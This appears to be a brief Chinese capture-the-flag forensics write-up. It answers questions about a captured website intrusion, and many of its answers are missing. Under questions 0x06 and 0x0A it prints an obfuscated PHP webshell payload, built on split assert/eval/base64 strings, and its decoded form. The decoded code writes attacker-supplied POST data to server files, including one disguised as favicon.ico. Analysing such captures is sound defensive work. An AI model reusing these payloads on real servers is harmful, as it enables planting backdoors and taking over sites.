重做了一下,以前杂项只专注做过密码与隐写,在铁三上就等着GG
0x01 网站后台密码是多少? 打开第二个数据包
passwd:aabbcc
0x02 攻击者IP是多少? 由上图得出为202.1.1.2
0x03 网站后台登陆地址是多少(http://+IP+路径)?
0x04 后台写入的Webshell内容是什么?
0x05 网站数据库密码是多少?
0x06 黑客第一个上传的php文件名是什么?
array_map("ass"."ert",array("ev"."Al("\$xx=\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9Jy92YXIvd3d3L2h0bWwvZGl5cGFnZS9zY2FuLnBocCc7JGM9JF9QT1NUWyJ6MSJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoJyUnLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCd3JyksJGJ1Zik/JzEnOicwJyk7O2VjaG8oIlhAWSIpO2RpZSgpOw=='));");"));
base64解码
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/scan.php';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
0x07 黑客对内网扫描的范围是多少(ip1-ip2)?
0x08 .黑客下载的数据库备份文件名是什么?
导出http对象,得到:
0x09 黑客上传的图片木马的密码是多少?
0x0A 黑客修改了哪个文件来配合木马文件(绝对路径)?
base64转码:@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/favicon.ico';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
0x0B FTP服务器开在了哪个端口?